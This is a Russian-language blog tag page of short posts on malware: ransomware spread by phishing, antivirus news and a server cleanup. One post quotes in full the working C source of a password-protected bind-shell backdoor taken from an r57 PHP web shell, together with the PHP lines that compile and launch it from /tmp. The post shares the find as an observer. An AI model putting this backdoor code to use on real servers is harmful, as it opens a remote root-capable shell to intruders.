← All posts tagged malware

Sportmaster
malware Знакомый переслал уже ставшее баяном письмо от "Арбитражного суда". При переходе по ссылке "Проверить информацию" с домена vk.com загружается .rtf, внутри которого .exe. В случае запуска .exe стартует процесс энкодера, который шифрует (RSA) файлы на диске и затем появляется сообщение с требованиями выкупа за расшифровку.
Вопрос: что заставляет людей открывать непонятные файлы (пусть и .rtf)?

Sportmaster
Kaspersky malware Заметил, что мне уже примерно как года полтора становится не по себе когда вижу/слышу слово "зловред". Вот тут goo.gl например, из-за передоза "зловредов" и "экспертов" не хочется читать новость до конца.
Нет, я ничего не имею против ЛК, но терминология очень своеобразна. Хотя, может это своеобразная визитная карточка? :)
Sportmaster
malware У соседей отработала одна из модификаций Trojan.Encoder. Хорошо, что копии ценных документов были еще и на других носителях. Вот такой выходной
Sportmaster
malware news.drweb.com эпично:
---
Несмотря на заявления киберпреступников, обе модификации троянца используют довольно примитивный потоковый алгоритм шифрования, при этом из-за недостатков реализации троянца пользовательские данные порой не могут расшифровать даже сами злоумышленники.
---
Школота отакуэ.
Sportmaster
malware В Испании разоблачили группу российских кибермошенников. Распространяли винлоки lenta.ru
Интересно, когда такое будет в новостях про правоохранительные органы РФ и СНГ? Видимо никто не обращается.
Sportmaster
Unix malware Имеем дело с обычным, на первый взгляд, php-shell'ом.
В теле скрипта в base64 код на С:
---
$port_bind_bd_c="
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
int main(argc,argv)
int argc;
char **argv;
{
int sockfd, newfd;
char buf[30];
struct sockaddr_in remote;
if(fork() == 0) {
remote.sin_family = AF_INET;
remote.sin_port = htons(atoi(argv[1]));
remote.sin_addr.s_addr = htonl(INADDR_ANY);
sockfd = socket(AF_INET,SOCK_STREAM,0);
if(!sockfd) perror("socket error");
bind(sockfd, (struct sockaddr *)&remote, 0x10);
listen(sockfd, 5);
while(1)
{
newfd=accept(sockfd,0,0);
dup2(newfd,0);
dup2(newfd,1);
dup2(newfd,2);
write(newfd,"Password:",10);
read(newfd,buf,sizeof(buf));
if (!chpass(argv[2],buf))
system("echo welcome to r57 shell POWERED by d35m0 && /bin/bash -i");
else
fprintf(stderr,"Sorry");
close(newfd);
}
}
}
int chpass(char *base, char *entered) {
int i;
for(i=0;i<strlen(entered);i++)
{
if(entered[i] == '\n')
entered[i] = '\0';
if(entered[i] == '\r')
entered[i] = '\0';
}
if (!strcmp(base,entered))
return 0;
}
";
---
Запускается так:
---
cf("/tmp/bd.c",$port_bind_bd_c);
$blah = ex("gcc -o /tmp/bd /tmp/bd.c");
@unlink("/tmp/bd.c");
$blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
$_POST['cmd']="ps -aux | grep bd";
---
Скажи мне кто такое — никогда не поверил бы...
Sportmaster
malware Поиск и удаление малвари на сервере под управлением Ubuntu — Done. Причина — загруженная пользователем с "левого" ресурса тема для Wordpress.